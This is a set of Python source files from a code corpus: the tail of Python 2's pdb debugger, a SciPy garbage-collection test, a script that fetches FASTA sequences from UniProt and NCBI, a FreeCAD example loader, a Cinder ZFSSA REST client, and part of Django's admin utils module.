pass
def print_stack_entry(self, frame_lineno, prompt_prefix=line_prefix):
frame, lineno = frame_lineno
if frame is self.curframe:
print >>self.stdout, '>',
else:
print >>self.stdout, ' ',
print >>self.stdout, self.format_stack_entry(frame_lineno,
prompt_prefix)
# Help methods (derived from pdb.doc)
def help_help(self):
self.help_h()
def help_h(self):
print >>self.stdout, """h(elp)
Without argument, print the list of available commands.
With a command name as argument, print help about that command
"help pdb" pipes the full documentation file to the $PAGER
"help exec" gives help on the ! command"""
def help_where(self):
self.help_w()
def help_w(self):
print >>self.stdout, """w(here)
Print a stack trace, with the most recent frame at the bottom.
An arrow indicates the "current frame", which determines the
context of most commands. 'bt' is an alias for this command."""
help_bt = help_w
def help_down(self):
self.help_d()
def help_d(self):
print >>self.stdout, """d(own)
Move the current frame one level down in the stack trace
(to a newer frame)."""
def help_up(self):
self.help_u()
def help_u(self):
print >>self.stdout, """u(p)
Move the current frame one level up in the stack trace
(to an older frame)."""
def help_break(self):
self.help_b()
def help_b(self):
print >>self.stdout, """b(reak) ([file:]lineno | function) [, condition]
With a line number argument, set a break there in the current
file. With a function name, set a break at first executable line
of that function. Without argument, list all breaks. If a second
argument is present, it is a string specifying an expression
which must evaluate to true before the breakpoint is honored.
The line number may be prefixed with a filename and a colon,
to specify a breakpoint in another file (probably one that
hasn't been loaded yet). The file is searched for on sys.path;
the .py suffix may be omitted."""
def help_clear(self):
self.help_cl()
def help_cl(self):
print >>self.stdout, "cl(ear) filename:lineno"
print >>self.stdout, """cl(ear) [bpnumber [bpnumber...]]
With a space separated list of breakpoint numbers, clear
those breakpoints. Without argument, clear all breaks (but
first ask confirmation). With a filename:lineno argument,
clear all breaks at that line in that file.
Note that the argument is different from previous versions of
the debugger (in python distributions 1.5.1 and before) where
a linenumber was used instead of either filename:lineno or
breakpoint numbers."""
def help_tbreak(self):
print >>self.stdout, """tbreak same arguments as break, but breakpoint is
removed when first hit."""
def help_enable(self):
print >>self.stdout, """enable bpnumber [bpnumber ...]
Enables the breakpoints given as a space separated list of
bp numbers."""
def help_disable(self):
print >>self.stdout, """disable bpnumber [bpnumber ...]
Disables the breakpoints given as a space separated list of
bp numbers."""
def help_ignore(self):
print >>self.stdout, """ignore bpnumber count
Sets the ignore count for the given breakpoint number. A breakpoint
becomes active when the ignore count is zero. When non-zero, the
count is decremented each time the breakpoint is reached and the
breakpoint is not disabled and any associated condition evaluates
to true."""
def help_condition(self):
print >>self.stdout, """condition bpnumber str_condition
str_condition is a string specifying an expression which
must evaluate to true before the breakpoint is honored.
If str_condition is absent, any existing condition is removed;
i.e., the breakpoint is made unconditional."""
def help_step(self):
self.help_s()
def help_s(self):
print >>self.stdout, """s(tep)
Execute the current line, stop at the first possible occasion
(either in a function that is called or in the current function)."""
def help_until(self):
self.help_unt()
def help_unt(self):
print """unt(il)
Continue execution until the line with a number greater than the current
one is reached or until the current frame returns"""
def help_next(self):
self.help_n()
def help_n(self):
print >>self.stdout, """n(ext)
Continue execution until the next line in the current function
is reached or it returns."""
def help_return(self):
self.help_r()
def help_r(self):
print >>self.stdout, """r(eturn)
Continue execution until the current function returns."""
def help_continue(self):
self.help_c()
def help_cont(self):
self.help_c()
def help_c(self):
print >>self.stdout, """c(ont(inue))
Continue execution, only stop when a breakpoint is encountered."""
def help_jump(self):
self.help_j()
def help_j(self):
print >>self.stdout, """j(ump) lineno
Set the next line that will be executed."""
def help_debug(self):
print >>self.stdout, """debug code
Enter a recursive debugger that steps through the code argument
(which is an arbitrary expression or statement to be executed
in the current environment)."""
def help_list(self):
self.help_l()
def help_l(self):
print >>self.stdout, """l(ist) [first [,last]]
List source code for the current file.
Without arguments, list 11 lines around the current line
or continue the previous listing.
With one argument, list 11 lines starting at that line.
With two arguments, list the given range;
if the second argument is less than the first, it is a count."""
def help_args(self):
self.help_a()
def help_a(self):
print >>self.stdout, """a(rgs)
Print the arguments of the current function."""
def help_p(self):
print >>self.stdout, """p expression
Print the value of the expression."""
def help_pp(self):
print >>self.stdout, """pp expression
Pretty-print the value of the expression."""
def help_exec(self):
print >>self.stdout, """(!) statement
Execute the (one-line) statement in the context of
the current stack frame.
The exclamation point can be omitted unless the first word
of the statement resembles a debugger command.
To assign to a global variable you must always prefix the
command with a 'global' command, e.g.:
(Pdb) global list_options; list_options = ['-l']
(Pdb)"""
def help_run(self):
print """run [args...]
Restart the debugged python program. If a string is supplied, it is
splitted with "shlex" and the result is used as the new sys.argv.
History, breakpoints, actions and debugger options are preserved.
"restart" is an alias for "run"."""
help_restart = help_run
def help_quit(self):
self.help_q()
def help_q(self):
print >>self.stdout, """q(uit) or exit - Quit from the debugger.
The program being executed is aborted."""
help_exit = help_q
def help_whatis(self):
print >>self.stdout, """whatis arg
Prints the type of the argument."""
def help_EOF(self):
print >>self.stdout, """EOF
Handles the receipt of EOF as a command."""
def help_alias(self):
print >>self.stdout, """alias [name [command [parameter parameter ...] ]]
Creates an alias called 'name' the executes 'command'. The command
must *not* be enclosed in quotes. Replaceable parameters are
indicated by %1, %2, and so on, while %* is replaced by all the
parameters. If no command is given, the current alias for name
is shown. If no name is given, all aliases are listed.
Aliases may be nested and can contain anything that can be
legally typed at the pdb prompt. Note! You *can* override
internal pdb commands with aliases! Those internal commands
are then hidden until the alias is removed. Aliasing is recursively
applied to the first word of the command line; all other words
in the line are left alone.
Some useful aliases (especially when placed in the .pdbrc file) are:
#Print instance variables (usage "pi classInst")
alias pi for k in %1.__dict__.keys(): print "%1.",k,"=",%1.__dict__[k]
#Print instance variables in self
alias ps pi self
"""
def help_unalias(self):
print >>self.stdout, """unalias name
Deletes the specified alias."""
def help_commands(self):
print >>self.stdout, """commands [bpnumber]
(com) ...
(com) end
(Pdb)
Specify a list of commands for breakpoint number bpnumber. The
commands themselves appear on the following lines. Type a line
containing just 'end' to terminate the commands.
To remove all commands from a breakpoint, type commands and
follow it immediately with end; that is, give no commands.
With no bpnumber argument, commands refers to the last
breakpoint set.
You can use breakpoint commands to start your program up again.
Simply use the continue command, or step, or any other
command that resumes execution.
Specifying any command resuming execution (currently continue,
step, next, return, jump, quit and their abbreviations) terminates
the command list (as if that command was immediately followed by end).
This is because any time you resume execution
(even with a simple next or step), you may encounter
another breakpoint--which could have its own command list, leading to
ambiguities about which list to execute.
If you use the 'silent' command in the command list, the
usual message about stopping at a breakpoint is not printed. This may
be desirable for breakpoints that are to print a specific message and
then continue. If none of the other commands print anything, you
see no sign that the breakpoint was reached.
"""
def help_pdb(self):
help()
def lookupmodule(self, filename):
"""Helper function for break/clear parsing -- may be overridden.
lookupmodule() translates (possibly incomplete) file or module name
into an absolute file name.
"""
if os.path.isabs(filename) and os.path.exists(filename):
return filename
f = os.path.join(sys.path[0], filename)
if os.path.exists(f) and self.canonic(f) == self.mainpyfile:
return f
root, ext = os.path.splitext(filename)
if ext == '':
filename = filename + '.py'
if os.path.isabs(filename):
return filename
for dirname in sys.path:
while os.path.islink(dirname):
dirname = os.readlink(dirname)
fullname = os.path.join(dirname, filename)
if os.path.exists(fullname):
return fullname
return None
def _runscript(self, filename):
# The script has to run in __main__ namespace (or imports from
# __main__ will break).
#
# So we clear up the __main__ and set several special variables
# (this gets rid of pdb's globals and cleans old variables on restarts).
import __main__
__main__.__dict__.clear()
__main__.__dict__.update({"__name__" : "__main__",
"__file__" : filename,
"__builtins__": __builtins__,
})
# When bdb sets tracing, a number of call and line events happens
# BEFORE debugger even reaches user's code (and the exact sequence of
# events depends on python version). So we take special measures to
# avoid stopping before we reach the main script (see user_line and
# user_call for details).
self._wait_for_mainpyfile = 1
self.mainpyfile = self.canonic(filename)
self._user_requested_quit = 0
statement = 'execfile( "%s")' % filename
self.run(statement)
# Simplified interface
def run(statement, globals=None, locals=None):
Pdb().run(statement, globals, locals)
def runeval(expression, globals=None, locals=None):
return Pdb().runeval(expression, globals, locals)
def runctx(statement, globals, locals):
# B/W compatibility
run(statement, globals, locals)
def runcall(*args, **kwds):
return Pdb().runcall(*args, **kwds)
def set_trace():
Pdb().set_trace(sys._getframe().f_back)
# Post-Mortem interface
def post_mortem(t=None):
# handling the default
if t is None:
# sys.exc_info() returns (type, value, traceback) if an exception is
# being handled, otherwise it returns None
t = sys.exc_info()[2]
if t is None:
raise ValueError("A valid traceback must be passed if no "
"exception is being handled")
p = Pdb()
p.reset()
p.interaction(None, t)
def pm():
post_mortem(sys.last_traceback)
# Main program for testing
TESTCMD = 'import x; x.main()'
def test():
run(TESTCMD)
# print help
def help():
for dirname in sys.path:
fullname = os.path.join(dirname, 'pdb.doc')
if os.path.exists(fullname):
sts = os.system('${PAGER-more} '+fullname)
if sts: print '*** Pager exit status:', sts
break
else:
print 'Sorry, can\'t find the help file "pdb.doc"',
print 'along the Python search path'
def main():
if not sys.argv[1:] or sys.argv[1] in ("--help", "-h"):
print "usage: pdb.py scriptfile [arg] ..."
sys.exit(2)
mainpyfile = sys.argv[1] # Get script filename
if not os.path.exists(mainpyfile):
print 'Error:', mainpyfile, 'does not exist'
sys.exit(1)
del sys.argv[0] # Hide "pdb.py" from argument list
# Replace pdb's dir with script's dir in front of module search path.
sys.path[0] = os.path.dirname(mainpyfile)
# Note on saving/restoring sys.argv: it's a good idea when sys.argv was
# modified by the script being debugged. It's a bad idea when it was
# changed by the user from the command line. There is a "restart" command which
# allows explicit specification of command line arguments.
pdb = Pdb()
while 1:
try:
pdb._runscript(mainpyfile)
if pdb._user_requested_quit:
break
print "The program finished and will be restarted"
except Restart:
print "Restarting", mainpyfile, "with arguments:"
print "\t" + " ".join(sys.argv[1:])
except SystemExit:
# In most cases SystemExit does not warrant a post-mortem session.
print "The program exited via sys.exit(). Exit status: ",
print sys.exc_info()[1]
except:
traceback.print_exc()
print "Uncaught exception. Entering post mortem debugging"
print "Running 'cont' or 'step' will restart the program"
t = sys.exc_info()[2]
pdb.interaction(None, t)
print "Post mortem debugger finished. The "+mainpyfile+" will be restarted"
# When invoked as main program, invoke the debugger on a script
if __name__ == '__main__':
import pdb
pdb.main()
| lgpl-2.1 |
anntzer/scipy | scipy/_lib/tests/test__gcutils.py | 12 | 3416 | """ Test for assert_deallocated context manager and gc utilities
"""
import gc
from scipy._lib._gcutils import (set_gc_state, gc_state, assert_deallocated,
ReferenceError, IS_PYPY)
from numpy.testing import assert_equal
import pytest
def test_set_gc_state():
gc_status = gc.isenabled()
try:
for state in (True, False):
gc.enable()
set_gc_state(state)
assert_equal(gc.isenabled(), state)
gc.disable()
set_gc_state(state)
assert_equal(gc.isenabled(), state)
finally:
if gc_status:
gc.enable()
def test_gc_state():
# Test gc_state context manager
gc_status = gc.isenabled()
try:
for pre_state in (True, False):
set_gc_state(pre_state)
for with_state in (True, False):
# Check the gc state is with_state in with block
with gc_state(with_state):
assert_equal(gc.isenabled(), with_state)
# And returns to previous state outside block
assert_equal(gc.isenabled(), pre_state)
# Even if the gc state is set explicitly within the block
with gc_state(with_state):
assert_equal(gc.isenabled(), with_state)
set_gc_state(not with_state)
assert_equal(gc.isenabled(), pre_state)
finally:
if gc_status:
gc.enable()
@pytest.mark.skipif(IS_PYPY, reason="Test not meaningful on PyPy")
def test_assert_deallocated():
# Ordinary use
class C:
def __init__(self, arg0, arg1, name='myname'):
self.name = name
for gc_current in (True, False):
with gc_state(gc_current):
# We are deleting from with-block context, so that's OK
with assert_deallocated(C, 0, 2, 'another name') as c:
assert_equal(c.name, 'another name')
del c
# Or not using the thing in with-block context, also OK
with assert_deallocated(C, 0, 2, name='third name'):
pass
assert_equal(gc.isenabled(), gc_current)
@pytest.mark.skipif(IS_PYPY, reason="Test not meaningful on PyPy")
def test_assert_deallocated_nodel():
class C:
pass
with pytest.raises(ReferenceError):
# Need to delete after using if in with-block context
# Note: assert_deallocated(C) needs to be assigned for the test
# to function correctly. It is assigned to c, but c itself is
# not referenced in the body of the with, it is only there for
# the refcount.
with assert_deallocated(C) as c:
pass
@pytest.mark.skipif(IS_PYPY, reason="Test not meaningful on PyPy")
def test_assert_deallocated_circular():
class C:
def __init__(self):
self._circular = self
with pytest.raises(ReferenceError):
# Circular reference, no automatic garbage collection
with assert_deallocated(C) as c:
del c
@pytest.mark.skipif(IS_PYPY, reason="Test not meaningful on PyPy")
def test_assert_deallocated_circular2():
class C:
def __init__(self):
self._circular = self
with pytest.raises(ReferenceError):
# Still circular reference, no automatic garbage collection
with assert_deallocated(C):
pass
| bsd-3-clause |
ChrisCummins/pip-db | tools/fetch-fasta.py | 1 | 4208 | #!/usr/bin/env python
#
# Copyright 2014 Chris Cummins.
#
# This file is part of pip-db.
#
# pip-db is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pip-db is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pip-db. If not, see <http://www.gnu.org/licenses/>.
#
import json
import re
import sys
import threading
import urllib
# URL regular expression
url_re = re.compile('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', re.IGNORECASE)
# UniProt sequence page expression
uniprot_sequence_re = re.compile('http://(www|ebi[0-9]).uniprot.org/uniprot/[A-Z0-9]{6}', re.IGNORECASE)
ncbi_url_re = re.compile('http://www.ncbi.nlm.nih.gov/protein/[^?]+')
# NCBI uidlist meta tag expression
ncbi_meta_re = re.compile('<meta name="ncbi_uidlist" content="([0-9]+)" />', re.IGNORECASE)
def warning(msg):
sys.stderr.write("warning: " + str(msg) + '\n')
def print_result(url, name, data):
print json.dumps({"url": url, "name": name, "data": data})
def line_to_urls(line):
return url_re.findall(line)
def get_url_set(input_stream):
url_list = []
for line in sys.stdin:
url_list = url_list + line_to_urls(line)
return set(url_list)
def get_uniprot_sequence_url_set(url_set):
return set(filter(uniprot_sequence_re.match, url_set))
def get_ncbi_url_set(url_set):
return set(filter(ncbi_url_re.match, url_set))
def fetch(url):
try:
return urllib.urlopen(url)
except IOError as e:
print "error: IO({0}): {1}".format(e.errno, e.strerror)
except Exception as e:
print "error:", e
class Spider(threading.Thread):
output_lock = threading.Lock()
def __init__(self, url, fetch):
threading.Thread.__init__(self)
self.url = url
self.fetch = fetch
def str2fasta(self, string):
lines = string.split("\n")
name = lines[0]
data = "\n".join(lines[1:]).replace("\n", "")
if not name.startswith(">"):
warning("sequence '" + self.url + "' name does not begin with '>'")
return {"name": name, "data": data}
def run(self):
fasta = self.str2fasta(self.fetch(self.url).strip())
if len(fasta):
with self.output_lock:
print_result(self.url, fasta["name"], fasta["data"])
def fetch_fasta_uniprot(url):
return fetch(url + '.fasta').read()
def fetch_fasta_ncbi(url):
def fetch_ncbi_uid(url):
for line in fetch(url):
m = ncbi_meta_re.search(line)
if m:
return m.group(1)
def ncbi_uid_to_fasta_url(uid):
return "http://www.ncbi.nlm.nih.gov/sviewer/viewer.cgi?tool=portal&sendto=on&log$=seqview&db=protein&dopt=fasta&sort=&val={0}&from=begin&to=end".format(uid)
uid = fetch_ncbi_uid(url)
if uid:
return fetch(ncbi_uid_to_fasta_url(uid)).read()
else:
warning("unable to retrieve NCBI UID for '" + url + "'. Ignoring.")
def run():
# Get the full list of URLs
urls = get_url_set(sys.stdin)
# Get the UniProt URLs
uniprot_urls = get_uniprot_sequence_url_set(urls)
urls = urls - uniprot_urls
# Get the NCBI URLs
ncbi_urls = get_ncbi_url_set(urls)
urls = urls - ncbi_urls
# Warn the user about ignored threads
for url in urls:
warning("cannot process URL '" + url + "'. Ignoring.")
# Spawn worker threads
threads = []
for url in uniprot_urls:
spider = Spider(url, fetch_fasta_uniprot)
spider.start()
threads.append(spider)
for url in ncbi_urls:
spider = Spider(url, fetch_fasta_ncbi)
spider.start()
threads.append(spider)
if __name__ == "__main__":
try:
run()
except Exception as e:
print "error:", e
| gpl-3.0 |
bblacey/FreeCAD-MacOS-CI | src/Mod/Start/StartPage/LoadFemExample3D.py | 13 | 1857 | #***************************************************************************
#* *
#* Copyright (c) 2012 *
#* Yorik van Havre <yorik@uncreated.net> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
import FreeCAD,FreeCADGui
FreeCAD.open(FreeCAD.getResourceDir()+"examples/FemCalculixCantilever3D.FCStd")
FreeCADGui.activeDocument().sendMsgToViews("ViewFit")
| lgpl-2.1 |
tmenjo/cinder-2015.1.0 | cinder/volume/drivers/zfssa/restclient.py | 4 | 11873 | # Copyright (c) 2014, Oracle and/or its affiliates. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
ZFS Storage Appliance REST API Client Programmatic Interface
"""
import httplib
import json
import StringIO
import time
import urllib2
from oslo_log import log
from cinder.i18n import _LE, _LI
LOG = log.getLogger(__name__)
class Status(object):
"""Result HTTP Status"""
def __init__(self):
pass
#: Request return OK
OK = httplib.OK
#: New resource created successfully
CREATED = httplib.CREATED
#: Command accepted
ACCEPTED = httplib.ACCEPTED
#: Command returned OK but no data will be returned
NO_CONTENT = httplib.NO_CONTENT
#: Bad Request
BAD_REQUEST = httplib.BAD_REQUEST
#: User is not authorized
UNAUTHORIZED = httplib.UNAUTHORIZED
#: The request is not allowed
FORBIDDEN = httplib.FORBIDDEN
#: The requested resource was not found
NOT_FOUND = httplib.NOT_FOUND
#: The request is not allowed
NOT_ALLOWED = httplib.METHOD_NOT_ALLOWED
#: Request timed out
TIMEOUT = httplib.REQUEST_TIMEOUT
#: Invalid request
CONFLICT = httplib.CONFLICT
#: Service Unavailable
BUSY = httplib.SERVICE_UNAVAILABLE
class RestResult(object):
"""Result from a REST API operation"""
def __init__(self, response=None, err=None):
"""Initialize a RestResult containing the results from a REST call
:param response: HTTP response
"""
self.response = response
self.error = err
self.data = ""
self.status = 0
if self.response:
self.status = self.response.getcode()
result = self.response.read()
while result:
self.data += result
result = self.response.read()
if self.error:
self.status = self.error.code
self.data = httplib.responses[self.status]
LOG.debug('Response code: %s' % self.status)
LOG.debug('Response data: %s' % self.data)
def get_header(self, name):
"""Get an HTTP header with the given name from the results
:param name: HTTP header name
:return: The header value or None if no value is found
"""
if self.response is None:
return None
info = self.response.info()
return info.getheader(name)
class RestClientError(Exception):
"""Exception for ZFS REST API client errors"""
def __init__(self, status, name="ERR_INTERNAL", message=None):
"""Create a REST Response exception
:param status: HTTP response status
:param name: The name of the REST API error type
:param message: Descriptive error message returned from REST call
"""
super(RestClientError, self).__init__(message)
self.code = status
self.name = name
self.msg = message
if status in httplib.responses:
self.msg = httplib.responses[status]
def __str__(self):
return "%d %s %s" % (self.code, self.name, self.msg)
class RestClientURL(object):
"""ZFSSA urllib2 client"""
def __init__(self, url, **kwargs):
"""Initialize a REST client.
:param url: The ZFSSA REST API URL
:key session: HTTP Cookie value of x-auth-session obtained from a
normal BUI login.
:key timeout: Time in seconds to wait for command to complete.
(Default is 60 seconds)
"""
self.url = url
self.local = kwargs.get("local", False)
self.base_path = kwargs.get("base_path", "/api")
self.timeout = kwargs.get("timeout", 60)
self.headers = None
if kwargs.get('session'):
self.headers['x-auth-session'] = kwargs.get('session')
self.headers = {"content-type": "application/json"}
self.do_logout = False
self.auth_str = None
def _path(self, path, base_path=None):
"""build rest url path"""
if path.startswith("http://") or path.startswith("https://"):
return path
if base_path is None:
base_path = self.base_path
if not path.startswith(base_path) and not (
self.local and ("/api" + path).startswith(base_path)):
path = "%s%s" % (base_path, path)
if self.local and path.startswith("/api"):
path = path[4:]
return self.url + path
def _authorize(self):
"""Performs authorization setting x-auth-session"""
self.headers['authorization'] = 'Basic %s' % self.auth_str
if 'x-auth-session' in self.headers:
del self.headers['x-auth-session']
try:
result = self.post("/access/v1")
del self.headers['authorization']
if result.status == httplib.CREATED:
self.headers['x-auth-session'] = \
result.get_header('x-auth-session')
self.do_logout = True
LOG.info(_LI('ZFSSA version: %s') %
result.get_header('x-zfssa-version'))
elif result.status == httplib.NOT_FOUND:
raise RestClientError(result.status, name="ERR_RESTError",
message="REST Not Available: \
Please Upgrade")
except RestClientError as err:
del self.headers['authorization']
raise err
def login(self, auth_str):
"""Login to an appliance using a user name and password.
Start a session like what is done logging into the BUI. This is not a
requirement to run REST commands, since the protocol is stateless.
What is does is set up a cookie session so that some server side
caching can be done. If login is used remember to call logout when
finished.
:param auth_str: Authorization string (base64)
"""
self.auth_str = auth_str
self._authorize()
def logout(self):
"""Logout of an appliance"""
result = None
try:
result = self.delete("/access/v1", base_path="/api")
except RestClientError:
pass
self.headers.clear()
self.do_logout = False
return result
def islogin(self):
"""return if client is login"""
return self.do_logout
@staticmethod
def mkpath(*args, **kwargs):
"""Make a path?query string for making a REST request
:cmd_params args: The path part
:cmd_params kwargs: The query part
"""
buf = StringIO.StringIO()
query = "?"
for arg in args:
buf.write("/")
buf.write(arg)
for k in kwargs:
buf.write(query)
if query == "?":
query = "&"
buf.write(k)
buf.write("=")
buf.write(kwargs[k])
return buf.getvalue()
def request(self, path, request, body=None, **kwargs):
"""Make an HTTP request and return the results
:param path: Path used with the initialized URL to make a request
:param request: HTTP request type (GET, POST, PUT, DELETE)
:param body: HTTP body of request
:key accept: Set HTTP 'Accept' header with this value
:key base_path: Override the base_path for this request
:key content: Set HTTP 'Content-Type' header with this value
"""
out_hdrs = dict.copy(self.headers)
if kwargs.get("accept"):
out_hdrs['accept'] = kwargs.get("accept")
if body:
if isinstance(body, dict):
body = str(json.dumps(body))
if body and len(body):
out_hdrs['content-length'] = len(body)
zfssaurl = self._path(path, kwargs.get("base_path"))
req = urllib2.Request(zfssaurl, body, out_hdrs)
req.get_method = lambda: request
maxreqretries = kwargs.get("maxreqretries", 10)
retry = 0
response = None
LOG.debug('Request: %s %s' % (request, zfssaurl))
LOG.debug('Out headers: %s' % out_hdrs)
if body and body != '':
LOG.debug('Body: %s' % body)
while retry < maxreqretries:
try:
response = urllib2.urlopen(req, timeout=self.timeout)
except urllib2.HTTPError as err:
if err.code == httplib.NOT_FOUND:
LOG.debug('REST Not Found: %s' % err.code)
else:
LOG.error(_LE('REST Not Available: %s') % err.code)
if err.code == httplib.SERVICE_UNAVAILABLE and \
retry < maxreqretries:
retry += 1
time.sleep(1)
LOG.error(_LE('Server Busy retry request: %s') % retry)
continue
if (err.code == httplib.UNAUTHORIZED or
err.code == httplib.INTERNAL_SERVER_ERROR) and \
'/access/v1' not in zfssaurl:
try:
LOG.error(_LE('Authorizing request: '
'%(zfssaurl)s'
'retry: %(retry)d .')
% {'zfssaurl': zfssaurl,
'retry': retry})
self._authorize()
req.add_header('x-auth-session',
self.headers['x-auth-session'])
except RestClientError:
pass
retry += 1
time.sleep(1)
continue
return RestResult(err=err)
except urllib2.URLError as err:
LOG.error(_LE('URLError: %s') % err.reason)
raise RestClientError(-1, name="ERR_URLError",
message=err.reason)
break
if response and response.getcode() == httplib.SERVICE_UNAVAILABLE and \
retry >= maxreqretries:
raise RestClientError(response.getcode(), name="ERR_HTTPError",
message="REST Not Available: Disabled")
return RestResult(response=response)
def get(self, path, **kwargs):
"""Make an HTTP GET request
:param path: Path to resource.
"""
return self.request(path, "GET", **kwargs)
def post(self, path, body="", **kwargs):
"""Make an HTTP POST request
:param path: Path to resource.
:param body: Post data content
"""
return self.request(path, "POST", body, **kwargs)
def put(self, path, body="", **kwargs):
"""Make an HTTP PUT request
:param path: Path to resource.
:param body: Put data content
"""
return self.request(path, "PUT", body, **kwargs)
def delete(self, path, **kwargs):
"""Make an HTTP DELETE request
:param path: Path to resource that will be deleted.
"""
return self.request(path, "DELETE", **kwargs)
def head(self, path, **kwargs):
"""Make an HTTP HEAD request
:param path: Path to resource.
"""
return self.request(path, "HEAD", **kwargs)
| apache-2.0 |
kevintaw/django | django/contrib/admin/utils.py | 8 | 16637 | from __future__ import unicode_literals
import datetime
import decimal
from collections import defaultdict
from django.contrib.auth import get_permission_codename
from django.core.exceptions import FieldDoesNotExist
from django.core.urlresolvers import NoReverseMatch, reverse
from django.db import models
from django.db.models.constants import LOOKUP_SEP
from django.db.models.deletion import Collector
from django.db.models.sql.constants import QUERY_TERMS
from django.forms.forms import pretty_name
from django.utils import formats, six, timezone
from django.utils.encoding import force_str, force_text, smart_text
from django.utils.html import format_html
from django.utils.text import capfirst
from django.utils.translation import ungettext
def lookup_needs_distinct(opts, lookup_path):
"""
Returns True if 'distinct()' should be used to query the given lookup path.
"""
lookup_fields = lookup_path.split('__')
# Remove the last item of the lookup path if it is a query term
if lookup_fields[-1] in QUERY_TERMS:
lookup_fields = lookup_fields[:-1]
# Now go through the fields (following all relations) and look for an m2m
for field_name in lookup_fields:
field = opts.get_field(field_name)
if hasattr(field, 'get_path_info'):
# This field is a relation, update opts to follow the relation
path_info = field.get_path_info()
opts = path_info[-1].to_opts
if any(path.m2m for path in path_info):
# This field is a m2m relation so we know we need to call distinct
return True
return False
def prepare_lookup_value(key, value):
"""
Returns a lookup value prepared to be used in queryset filtering.
"""
# if key ends with __in, split parameter into separate values
if key.endswith('__in'):
value = value.split(',')
# if key ends with __isnull, special case '' and the string literals 'false' and '0'
if key.endswith('__isnull'):
if value.lower() in ('', 'false', '0'):
value = False
else:
value = True
return value
def quote(s):
"""
Ensure that primary key values do not confuse the admin URLs by escaping
any '/', '_' and ':' and similarly problematic characters.
Similar to urllib.quote, except that the quoting is slightly different so
that it doesn't get automatically unquoted by the Web browser.
"""
if not isinstance(s, six.string_types):
return s
res = list(s)
for i in range(len(res)):
c = res[i]
if c in """:/_#?;@&=+$,"[]<>%\\""":
res[i] = '_%02X' % ord(c)
return ''.join(res)
def unquote(s):
"""
Undo the effects of quote(). Based heavily on urllib.unquote().
"""
mychr = chr
myatoi = int
list = s.split('_')
res = [list[0]]
myappend = res.append
del list[0]
for item in list:
if item[1:2]:
try:
myappend(mychr(myatoi(item[:2], 16)) + item[2:])
except ValueError:
myappend('_' + item)
else:
myappend('_' + item)
return "".join(res)
def flatten(fields):
"""Returns a list which is a single level of flattening of the
original list."""
flat = []
for field in fields:
if isinstance(field, (list, tuple)):
flat.extend(field)
else:
flat.append(field)
return flat
def flatten_fieldsets(fieldsets):
"""Returns a list of field names from an admin fieldsets structure."""
field_names = []
for name, opts in fieldsets:
field_names.extend(
flatten(opts['fields'])
)
return field_names
def get_deleted_objects(objs, opts, user, admin_site, using):
"""
Find all objects related to ``objs`` that should also be deleted. ``objs``
must be a homogeneous iterable of objects (e.g. a QuerySet).
Returns a nested list of strings suitable for display in the
template with the ``unordered_list`` filter.
"""
collector = NestedObjects(using=using)
collector.collect(objs)
perms_needed = set()
def format_callback(obj):
has_admin = obj.__class__ in admin_site._registry
opts = obj._meta
no_edit_link = '%s: %s' % (capfirst(opts.verbose_name),
force_text(obj))
if has_admin:
try:
admin_url = reverse('%s:%s_%s_change'
% (admin_site.name,
opts.app_label,
opts.model_name),
None, (quote(obj._get_pk_val()),))
except NoReverseMatch:
# Change url doesn't exist -- don't display link to edit
return no_edit_link
p = '%s.%s' % (opts.app_label,
get_permission_codename('delete', opts))
if not user.has_perm(p):
perms_needed.add(opts.verbose_name)
# Display a link to the admin page.
return format_html('{}: <a href="{}">{}</a>',
capfirst(opts.verbose_name),
admin_url,
obj)
else:
# Don't display link to edit, because it either has no
# admin or is edited inline.
return no_edit_link
to_delete = collector.nested(format_callback)
protected = [format_callback(obj) for obj in collector.protected]
return to_delete, collector.model_count, perms_needed, protected
class NestedObjects(Collector):
def __init__(self, *args, **kwargs):
super(NestedObjects, self).__init__(*args, **kwargs)
self.edges = {} # {from_instance: [to_instances]}
self.protected = set()
self.model_count = defaultdict(int)
def add_edge(self, source, target):
self.edges.setdefault(source, []).append(target)
def collect(self, objs, source=None, source_attr=None, **kwargs):
for obj in objs:
if source_attr and not source_attr.endswith('+'):
related_name = source_attr % {
'class': source._meta.model_name,
'app_label': source._meta.app_label,
}
self.add_edge(getattr(obj, related_name), obj)
else:
self.add_edge(None, obj)
self.model_count[obj._meta.verbose_name_plural] += 1
try:
return super(NestedObjects, self).collect(objs, source_attr=source_attr, **kwargs)
except models.ProtectedError as e:
self.protected.update(e.protected_objects)
def related_objects(self, related, objs):
qs = super(NestedObjects, self).related_objects(related, objs)
return qs.select_related(related.field.name)
def _nested(self, obj, seen, format_callback):
if obj in seen:
return []
seen.add(obj)
children = []
for child in self.edges.get(obj, ()):
children.extend(self._nested(child, seen, format_callback))
if format_callback:
ret = [format_callback(obj)]
else:
ret = [obj]
if children:
ret.append(children)
return ret
def nested(self, format_callback=None):
"""
Return the graph as a nested list.
"""
seen = set()
roots = []
for root in self.edges.get(None, ()):
roots.extend(self._nested(root, seen, format_callback))
return roots
def can_fast_delete(self, *args, **kwargs):
"""
We always want to load the objects into memory so that we can display
them to the user in confirm page.
"""
return False
